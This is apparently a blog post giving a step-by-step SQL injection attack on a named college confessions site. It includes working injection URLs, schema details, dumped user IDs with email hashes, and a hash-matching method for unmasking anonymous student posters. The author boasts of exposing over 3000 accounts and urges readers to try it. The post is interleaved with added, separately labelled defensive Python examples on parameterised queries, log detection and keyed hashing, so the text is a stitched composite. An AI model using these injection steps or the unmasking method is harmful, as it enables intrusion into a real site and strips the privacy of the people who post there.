Jhu Conf Hacked

May 2020

The whole site is vulnerable to something called SQL injection. The following link shows all of the vulnerable fields on a given webpage (using a random thread; you could use any one you wanted, though):

http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14-

As we can see, 1,3,4,5,6,7,8,9 are all vulnerable fields where we can put data we want pulled from the SQL database (the thing that holds user IDs and emails). I'm going to skip a few parts here and get to the nitty-gritty of the matter. The overall database is called "acb" and it has the following tables:

tbl_attempts, tbl_crush, tbl_emails, tbl_free_posts, tbl_message_headers, tbl_messages, tbl_moderators, tbl_newpasses, tbl_original_posts, tbl_recentmail, tbl_replies, tbl_reports, tbl_schools, tbl_topics, tbl_users, tbl_views, tbl_votes

tbl_crush looks potentially embarrassing, as does tbl_messages, but right now we're after tbl_emails, tbl_replies, tbl_topics and tbl_users. The thing is, when we specify what table we want to check out, instead of writing "tbl_users", we have to write it in hex. So we get the following URL (change the hex code for tbl_users to the hex code for any other table you want):

http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=0x74626C5F7573657273-

This table has the following fields: id, email, password, num_bans, ban, school_tag, time, fb_id, activation. What does this mean? It means that every email has a specific ID number attached to it (as well as the number of bans said person has received).
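The injection works because the id parameter from sb.php is pasted straight into the SQL text, so "AND 1=0 UNION SELECT ..." becomes part of the statement. The following is an added example, not code from the page or from the site: it rebuilds a tiny stand-in for the schema in an in-memory SQLite database (table and column names from the page, row contents constructed) and shows the string-concatenated query beside its parameterised replacement. The probe is the page's own, reduced to three columns to fit the constructed tables.

```python
import sqlite3

# Constructed stand-in for the site's schema. Table and column names follow
# the page; the rows are made up for this example.
SCHEMA = """
CREATE TABLE tbl_topics (id INTEGER PRIMARY KEY, user_id INTEGER, title TEXT);
CREATE TABLE tbl_users  (id INTEGER PRIMARY KEY, email TEXT, num_bans INTEGER);
INSERT INTO tbl_topics VALUES (91305, 7, 'Spring formal');
INSERT INTO tbl_users  VALUES (7, 'hash-of-user7', 0), (8, 'hash-of-user8', 2);
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def thread_unsafe(conn, thread_id):
    # The pattern behind sb.php?...&id=...: the request parameter is pasted
    # into the SQL text, so the parser sees whatever the client sent.
    sql = "SELECT id, user_id, title FROM tbl_topics WHERE id=" + thread_id
    return conn.execute(sql).fetchall()


def thread_safe(conn, thread_id):
    # Hardened form: reject anything that is not an integer, then bind the
    # value as a parameter. Bound values can never change the statement.
    try:
        tid = int(thread_id)
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, user_id, title FROM tbl_topics WHERE id=?", (tid,)
    ).fetchall()


# The page's probe, cut down to three columns to match the constructed schema.
PROBE = "91305 AND 1=0 UNION SELECT ALL id, email, num_bans FROM tbl_users"


def demo():
    conn = open_db()
    return {
        "unsafe_normal": thread_unsafe(conn, "91305"),
        # AND 1=0 empties the thread result, so only tbl_users rows come back.
        "unsafe_probe": thread_unsafe(conn, PROBE),
        "safe_normal": thread_safe(conn, "91305"),
        "safe_probe": thread_safe(conn, PROBE),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

The integer check is not the real defence (a thread id that legitimately had to be a string would still need binding); the parameter placeholder is. The check just turns a probe into an empty, loggable response instead of a database error.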
Let's pull out ID and email, using the following (should be obvious how it was done, if you're playing along at home):

http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,group_concat(id,0x3a,email),5,6,7,8,9,10,11,12,13,14+from+tbl_users

Now, let's look at the output:

1:2651ff645f9949cd88e65aa0c733a22 2:1351a3c14ae48d5462cc1096ebadb94 3:43acb94e5432110d6604718b8c7f81f 4:c10caae0a314510031f6aaac754f084 5:fcb046a1aa98eb4fe7b98c0f9d6cb4a 6:487a7afeeaa5a00cae8f191abacf1b0 7:cd17ec6c819d64ac575bf3b0531c6c5 8:b72c1c9a78f8ac6eaffa1c129555bb7 9:5b42058073d035b6c6242eaa7876611 10:8c0d386e56576a31d7c64d2123d0952 11:1f5067ee8d726b3549122852d60237d 12:e96a0663305e7053a4a4d6e9bfb1ec3 13:b635dc909f8883090eecda1b2831bd6 14:3ee438b984b69c6f862e45ff7ce0550 15:213cf12185143e9793361bd98396420 16:c7753566d9a7c811e7441624a707b9b 17:fc6aa936d018d93bc86b46a723d728d 18:7b31866f43862f5640139ff1687e968 19:5be6fb314ba1bf898838c4776c060f8 20:204c00ef9a61e7be72f338db07f27cd 21:644b220fb11b108b59f3be286186372 22:6834320ff262f7340b88c83232d77d9 23:a0b4ad04099b001007e800589b98c92 24:84ac74750c3aa18fc9b9dfb481afb20 25:e2c37b7c5f85f7d3822d7f34df07a24 26:059f15d50c08c2481bbf4abeb424d71 27:112dbae75e470ef53cf88ac4226158d 28:ddf59f65913c9c4ddbe788db15d83e5 29:ea2cc6275a3f8b4f982756ebaceef68

We've obviously reached some kind of character limit, so (unfortunately) we have to run the code multiple times, using something like this to start our count at the truncated user (user 30 was cut off, in this case):

http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,group_concat(id,0x3a,email),5,6,7,8,9,10,11,12,13,14+from+tbl_users+where+id%3E29-

See, we're asking to get data from tbl_users where id>29. Just run this multiple times over and over and you'll get all the data you need (in about 30 minutes I pulled about 3000 accounts, can share if needed). But look, the email is encrypted. Any good cryptologist can see that this is just the SQL PASSWORD() command. While it's very hard to break PASSWORD(), the designers of the site did something wonderful for us: "tbl_emails" lists two fields, "email" and "school". If we run the following, we see users' emails and the school they are associated with:

http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,group_concat(email,0x3a,school),5,6,7,8,9,10,11,12,13,14+from+tbl_emails-

Now we can limit the search parameters to only include school "jhu", and once we have all these emails we can simply run them through MySQL's PASSWORD() command and match each one up with the encrypted return we pulled from the database, then modify our search to exclude those emails and continue on ad nauseam.
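Every request in this walk-through has a distinctive shape: a numeric id parameter carrying "UNION SELECT", information_schema, a long hex literal for a table name, or an "id>N" tail that moves forward each time the loop is re-run. Those are visible in the web server's access log long before anyone notices the database dump. The following is an added example, not code from the page: it parses constructed common-log-format lines whose query strings follow the requests quoted above (client addresses, timestamps and sizes are made up), decodes each parameter the way the application would, and flags the ones that match those patterns. The rule names and thresholds are this example's own choices.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log sample. The query strings mirror the requests quoted
# on the page; addresses, timestamps and byte counts are invented.
SAMPLE_LOG = """\
198.51.100.7 - - [03/Mar/2011:21:14:02 -0500] "GET /sb.php?school=jhu&page=thread&id=91305 HTTP/1.1" 200 8123
203.0.113.5 - - [03/Mar/2011:21:15:10 -0500] "GET /sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14-- HTTP/1.1" 200 7710
203.0.113.5 - - [03/Mar/2011:21:15:41 -0500] "GET /sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=0x74626C5F7573657273-- HTTP/1.1" 200 7902
203.0.113.5 - - [03/Mar/2011:21:16:03 -0500] "GET /sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,group_concat(id,0x3a,email),5,6,7,8,9,10,11,12,13,14+from+tbl_users+where+id%3E29-- HTTP/1.1" 200 9001
198.51.100.9 - - [03/Mar/2011:21:16:30 -0500] "GET /sb.php?school=jhu&page=thread&id=91306 HTTP/1.1" 200 8044
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Each rule runs against the decoded value of every query parameter.
RULES = [
    ("union_select", re.compile(r"\bunion\s+select\b", re.I)),
    ("schema_probe", re.compile(r"\binformation_schema\b", re.I)),
    # A hex literal long enough to spell a table name; 0x3a alone is ignored.
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{6,}\b", re.I)),
    ("bool_append", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+\b", re.I)),
]
# Parameters the application only ever uses as integers.
NUMERIC_PARAMS = {"id"}


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl undoes both + and %XX encoding, so "UNION+SELECT" and
    # "id%3E29" come back as the text the database would have seen.
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def inspect(rec):
    reasons = []
    for name, value in rec["params"]:
        if name in NUMERIC_PARAMS and not value.isdigit():
            reasons.append(f"{name}_not_numeric")
        for label, rx in RULES:
            if rx.search(value):
                reasons.append(f"{label}:{name}")
    return reasons


def scan_access_log(text):
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = inspect(rec)
        if reasons:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "reasons": reasons})
    return hits


def repeat_offenders(hits, threshold=3):
    # The "run this multiple times" paging loop shows up as a run of flagged
    # requests from one client; count them per address.
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["ts"], ", ".join(h["reasons"]))
    print("repeat offenders:", repeat_offenders(found))
```

The id_not_numeric rule alone catches every request in the walk-through, because each one puts SQL text into a parameter the application only ever uses as an integer; the pattern rules add an explanation of what the request was after.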

That's not really what most of us want. We want to see who could probably be posting about us, or somebody we know. So instead, it's much easier to encrypt-then-match people's JHED emails that you know. Let's say I think Frat Brother #4 posted something bad about my buddy; luckily I know his name and can guess his JHED (and, trust me, ~90% of people here signed up with their JHEDs). So I run PASSWORD([email protected]), get an encrypted string, and match it up to the data I pulled so I can see what user ID is attached to it. If there's no hit, I try PASSWORD([email protected]), increasing the number up to some reasonable value before giving up. Once we have an email account's ID number, it's all a matter of sorting through tbl_replies or tbl_topics by user ID to see what this one person has posted. There are many more refined methods of doing this, but this is probably the one people will want to know how to do. It's also possible to just select one field (I like field 5) in a given thread and have it display that person's ID number, or anything else if you're so inclined. Play around, get a feel for the database architecture, and you can do some cool stuff.

Oh, and a note to people using emails different from their JHED-given ones: the school's database should allow you to tease out what emails are registered to what JHED ID (looking at you, [email protected]). Trying to find a way to link them; it shouldn't be that hard.

Who would go through all of this trouble? Well, it's not that much of a hassle if you can write up some scripts to do it for you. Which I did: a little Perl script that goes through the school's directory (pulled an offline copy), gets each person's name and makes a presumed JHED email for them based on their first initial, up to 6 letters of their last name, and gives them a number based on frequency. It also generates a [email protected] address to test too. Then it batch-encrypted them, and matched to ID numbers, and now I've got over 3000 accounts open for business. I won't be sharing these. Suffice to say, somebody knows everything you've posted now. You guys should be nicer to each other.

Total time for the home hacker: 3 hours, give or take. It's a good way to learn how to NOT set up a secure database, too. Total time for YOLO: an hour, if you can stick with it. Then you'll know everything your best friend has been saying about you :) [seriously, watching this is like watching a soap opera, it's awesome] Have fun! Post results!
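The encrypt-then-match step works only because the stored value is a deterministic function of a guessable input with nothing secret mixed in: anyone holding the dump can compute the same function over a list of likely addresses and compare. The following is an added example, not code from the page or the site, showing the design that closes that gap. It stands in for PASSWORD() with an unkeyed SHA-256 digest (the page's hashes are not reproduced), puts an HMAC under a server-held secret beside it, and measures how many of a constructed candidate list each scheme gives away. Account rows, addresses and the secret are all constructed here.

```python
import hashlib
import hmac
import secrets

# Constructed account table: (user id, address). Addresses are invented.
ACCOUNTS = [
    (1, "jsmith1@example.edu"),
    (2, "adoe3@example.edu"),
    (3, "someone.private@example.org"),
]

# Constructed guess list in the shape the page describes: initial, surname,
# trailing number. Two of these correspond to real rows above, two do not.
CANDIDATES = [
    "jsmith1@example.edu",
    "jsmith2@example.edu",
    "adoe3@example.edu",
    "bwhite4@example.edu",
]


def unkeyed_token(email):
    # Stand-in for the site's scheme as the page describes it: a digest that
    # anyone can recompute from the address alone.
    return hashlib.sha256(email.lower().encode()).hexdigest()


def keyed_token(email, key):
    # Same lookup property for the application, but recomputing it requires
    # the key, which lives in the app's configuration, not in tbl_users.
    return hmac.new(key, email.lower().encode(), hashlib.sha256).hexdigest()


def guess_and_match(stored, candidates, token_fn):
    """Return {candidate: user_id} for each candidate whose token is in stored.

    This is the matching step the page describes, used here to measure how
    much of the candidate list a given storage scheme exposes."""
    by_token = {tok: uid for uid, tok in stored}
    return {c: by_token[token_fn(c)] for c in candidates if token_fn(c) in by_token}


def exposure_demo():
    key = secrets.token_bytes(32)  # server-side secret; never written to the table
    unkeyed_store = [(uid, unkeyed_token(e)) for uid, e in ACCOUNTS]
    keyed_store = [(uid, keyed_token(e, key)) for uid, e in ACCOUNTS]
    return {
        # The dump alone is enough to confirm which guessed addresses exist.
        "unkeyed_matches": guess_and_match(unkeyed_store, CANDIDATES, unkeyed_token),
        # With only the dump and no key, guesses can never line up with tokens.
        "keyed_without_key": guess_and_match(keyed_store, CANDIDATES, unkeyed_token),
        # The application, holding the key, still resolves a known address.
        "keyed_with_key": guess_and_match(
            keyed_store, ["adoe3@example.edu"], lambda e: keyed_token(e, key)
        ),
    }


if __name__ == "__main__":
    for label, result in exposure_demo().items():
        print(label, result)
```

A per-row random salt would defeat the batch match just as well, but then a lookup by address has to rehash against every row; the keyed token keeps the single-index lookup the site relied on while tying any recomputation to a secret that is not in the database. Either way the exercise in the text stops at the "no hit" branch.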
